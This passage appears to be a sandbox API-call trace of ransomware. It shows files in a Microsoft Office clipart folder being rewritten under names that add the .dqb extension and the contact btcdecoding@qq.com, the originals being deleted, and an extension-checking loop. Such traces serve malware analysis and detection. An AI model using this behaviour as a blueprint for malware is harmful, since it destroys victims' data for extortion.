SetEndOfFile (hFile=0x20c) returned 1 [0051.055] CloseHandle (hObject=0x20c) returned 1 [0051.055] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0051.055] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01060_.wmf")) returned 1 [0051.055] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 63 [0051.055] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 63 [0051.055] lstrlenW (lpString=".doc") returned 4 [0051.055] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0051.055] lstrlenW (lpString=".docx") returned 5 [0051.055] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0051.055] lstrlenW (lpString=".pdf") returned 4 [0051.055] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0051.055] lstrlenW (lpString=".xls") returned 4 [0051.055] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0051.055] lstrlenW (lpString=".xlsx") returned 5 [0051.055] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0051.055] lstrlenW (lpString=".ppt") returned 4 [0051.056] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0051.056] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 63 [0051.056] lstrlenW (lpString=".zip") returned 4 [0051.056] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0051.056] lstrlenW (lpString=".rar") returned 4 [0051.056] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0051.056] lstrlenW (lpString=".bz2") returned 4 [0051.056] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0051.056] lstrlenW (lpString=".7z") returned 3 [0051.056] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0051.056] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 63 [0051.056] lstrlenW (lpString=".dbf") returned 4 [0051.056] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0051.056] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 63 [0051.056] lstrlenW (lpString=".1cd") returned 4 [0051.056] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0051.056] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 63 [0051.056] lstrlenW (lpString=".jpg") returned 4 [0051.056] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0051.056] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.056] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.056] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01084_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0051.057] GetLastError () returned 0x0 [0051.057] ReadFile (in: hFile=0x20c, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x728, lpOverlapped=0x0) returned 1 [0051.058] WriteFile (in: hFile=0x160, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x730, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x730, lpOverlapped=0x0) returned 1 [0051.059] ReadFile (in: hFile=0x20c, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.059] WriteFile (in: hFile=0x160, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.059] SetEndOfFile (hFile=0x160) returned 1 [0051.059] CloseHandle (hObject=0x160) returned 1 [0051.059] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.059] SetEndOfFile (hFile=0x20c) returned 1 [0051.060] CloseHandle (hObject=0x20c) returned 1 [0051.060] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0051.060] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01084_.wmf")) returned 1 [0051.061] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 63 [0051.061] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 63 [0051.061] lstrlenW (lpString=".doc") returned 4 [0051.061] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0051.061] lstrlenW (lpString=".docx") returned 5 [0051.061] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0051.061] lstrlenW (lpString=".pdf") returned 4 [0051.061] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0051.061] lstrlenW (lpString=".xls") returned 4 [0051.061] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0051.061] lstrlenW (lpString=".xlsx") returned 5 [0051.061] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0051.061] lstrlenW (lpString=".ppt") returned 4 [0051.061] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0051.061] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 63 [0051.061] lstrlenW (lpString=".zip") returned 4 [0051.061] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0051.061] lstrlenW (lpString=".rar") returned 4 [0051.061] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0051.061] lstrlenW (lpString=".bz2") returned 4 [0051.061] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0051.061] lstrlenW (lpString=".7z") returned 3 [0051.061] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0051.061] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 63 [0051.061] lstrlenW (lpString=".dbf") returned 4 [0051.061] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0051.061] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 63 [0051.061] lstrlenW (lpString=".1cd") returned 4 [0051.061] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0051.061] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 63 [0051.061] lstrlenW (lpString=".jpg") returned 4 [0051.061] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0051.065] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.065] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.065] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01173_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0051.065] GetLastError () returned 0x0 [0051.065] ReadFile (in: hFile=0x180, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x66dc, lpOverlapped=0x0) returned 1 [0051.068] WriteFile (in: hFile=0x20c, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x66e0, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x66e0, lpOverlapped=0x0) returned 1 [0051.070] ReadFile (in: hFile=0x180, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.070] WriteFile (in: hFile=0x20c, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.070] SetEndOfFile (hFile=0x20c) returned 1 [0051.070] CloseHandle (hObject=0x20c) returned 1 [0051.070] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.070] SetEndOfFile (hFile=0x180) returned 1 [0051.071] CloseHandle (hObject=0x180) returned 1 [0051.071] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0051.071] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01173_.wmf")) returned 1 [0051.071] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 63 [0051.071] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 63 [0051.071] lstrlenW (lpString=".doc") returned 4 [0051.071] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0051.072] lstrlenW (lpString=".docx") returned 5 [0051.072] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0051.072] lstrlenW (lpString=".pdf") returned 4 [0051.072] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0051.072] lstrlenW (lpString=".xls") returned 4 [0051.072] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0051.072] lstrlenW (lpString=".xlsx") returned 5 [0051.072] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0051.072] lstrlenW (lpString=".ppt") returned 4 [0051.072] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0051.072] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 63 [0051.072] lstrlenW (lpString=".zip") returned 4 [0051.072] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0051.072] lstrlenW (lpString=".rar") returned 4 [0051.072] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0051.072] lstrlenW (lpString=".bz2") returned 4 [0051.072] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0051.072] lstrlenW (lpString=".7z") returned 3 [0051.072] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0051.072] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 63 [0051.072] lstrlenW (lpString=".dbf") returned 4 [0051.072] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0051.072] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 63 [0051.072] lstrlenW (lpString=".1cd") returned 4 [0051.072] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0051.072] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 63 [0051.072] lstrlenW (lpString=".jpg") returned 4 [0051.072] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0051.073] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.073] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.073] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01174_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0051.073] GetLastError () returned 0x0 [0051.073] ReadFile (in: hFile=0x180, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x6cd2, lpOverlapped=0x0) returned 1 [0051.349] WriteFile (in: hFile=0x20c, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x6ce0, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x6ce0, lpOverlapped=0x0) returned 1 [0051.351] ReadFile (in: hFile=0x180, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.351] WriteFile (in: hFile=0x20c, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.351] SetEndOfFile (hFile=0x20c) returned 1 [0051.351] CloseHandle (hObject=0x20c) returned 1 [0051.351] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.351] SetEndOfFile (hFile=0x180) returned 1 [0051.352] CloseHandle (hObject=0x180) returned 1 [0051.352] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0051.352] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01174_.wmf")) returned 1 [0052.013] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 63 [0052.013] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 63 [0052.013] lstrlenW (lpString=".doc") returned 4 [0052.013] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0052.013] lstrlenW (lpString=".docx") returned 5 [0052.013] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0052.013] lstrlenW (lpString=".pdf") returned 4 [0052.013] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0052.013] lstrlenW (lpString=".xls") returned 4 [0052.013] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0052.013] lstrlenW (lpString=".xlsx") returned 5 [0052.013] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0052.013] lstrlenW (lpString=".ppt") returned 4 [0052.014] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0052.014] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 63 [0052.014] lstrlenW (lpString=".zip") returned 4 [0052.014] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0052.014] lstrlenW (lpString=".rar") returned 4 [0052.014] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0052.014] lstrlenW (lpString=".bz2") returned 4 [0052.014] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0052.014] lstrlenW (lpString=".7z") returned 3 [0052.014] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0052.014] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 63 [0052.014] lstrlenW (lpString=".dbf") returned 4 [0052.014] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0052.014] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 63 [0052.014] lstrlenW (lpString=".1cd") returned 4 [0052.014] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0052.014] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 63 [0052.014] lstrlenW (lpString=".jpg") returned 4 [0052.014] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0052.919] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.924] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.924] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04191_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x234 [0052.937] GetLastError () returned 0x0 [0052.937] ReadFile (in: hFile=0x184, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x19ec, lpOverlapped=0x0) returned 1 [0052.954] WriteFile (in: hFile=0x234, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x19f0, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x19f0, lpOverlapped=0x0) returned 1 [0052.955] ReadFile (in: hFile=0x184, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0052.955] WriteFile (in: hFile=0x234, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.955] SetEndOfFile (hFile=0x234) returned 1 [0052.955] CloseHandle (hObject=0x234) returned 1 [0052.955] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.955] SetEndOfFile (hFile=0x184) returned 1 [0052.956] CloseHandle (hObject=0x184) returned 1 [0052.956] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0052.957] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04191_.wmf")) returned 1 [0052.972] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF") returned 63 [0052.972] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF") returned 63 [0052.972] lstrlenW (lpString=".doc") returned 4 [0052.972] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0052.972] lstrlenW (lpString=".docx") returned 5 [0052.972] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0052.972] lstrlenW (lpString=".pdf") returned 4 [0052.972] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0052.972] lstrlenW (lpString=".xls") returned 4 [0052.972] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0052.972] lstrlenW (lpString=".xlsx") returned 5 [0052.972] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0052.972] lstrlenW (lpString=".ppt") returned 4 [0052.972] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0052.973] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF") returned 63 [0052.973] lstrlenW (lpString=".zip") returned 4 [0052.973] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0052.973] lstrlenW (lpString=".rar") returned 4 [0052.973] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0052.973] lstrlenW (lpString=".bz2") returned 4 [0052.973] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0052.973] lstrlenW (lpString=".7z") returned 3 [0052.973] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0052.973] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF") returned 63 [0052.973] lstrlenW (lpString=".dbf") returned 4 [0052.973] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0052.973] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF") returned 63 [0052.973] lstrlenW (lpString=".1cd") returned 4 [0052.973] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0052.973] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF") returned 63 [0052.973] lstrlenW (lpString=".jpg") returned 4 [0052.973] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.502] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.511] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.517] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04326_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04326_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0053.517] GetLastError () returned 0x0 [0053.523] ReadFile (in: hFile=0x17c, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0xd14, lpOverlapped=0x0) returned 1 [0053.525] WriteFile (in: hFile=0x230, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xd20, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xd20, lpOverlapped=0x0) returned 1 [0053.525] ReadFile (in: hFile=0x17c, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.526] WriteFile (in: hFile=0x230, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.526] SetEndOfFile (hFile=0x230) returned 1 [0053.526] CloseHandle (hObject=0x230) returned 1 [0053.526] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.526] SetEndOfFile (hFile=0x17c) returned 1 [0053.527] CloseHandle (hObject=0x17c) returned 1 [0053.527] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04326_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0053.527] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04326_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04326_.wmf")) returned 1 [0053.527] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04326_.WMF") returned 63 [0053.527] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04326_.WMF") returned 63 [0053.527] lstrlenW (lpString=".doc") returned 4 [0053.527] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.527] lstrlenW (lpString=".docx") returned 5 [0053.527] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.527] lstrlenW (lpString=".pdf") returned 4 [0053.527] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.527] lstrlenW (lpString=".xls") returned 4 [0053.527] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.527] lstrlenW (lpString=".xlsx") returned 5 [0053.527] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.527] lstrlenW (lpString=".ppt") returned 4 [0053.528] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.528] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04326_.WMF") returned 63 [0053.528] lstrlenW (lpString=".zip") returned 4 [0053.528] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.528] lstrlenW (lpString=".rar") returned 4 [0053.528] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.528] lstrlenW (lpString=".bz2") returned 4 [0053.528] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.528] lstrlenW (lpString=".7z") returned 3 [0053.528] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.528] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04326_.WMF") returned 63 [0053.528] lstrlenW (lpString=".dbf") returned 4 [0053.528] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.528] lstrlenW (lpString="C:\\Program Files\\Microsoft 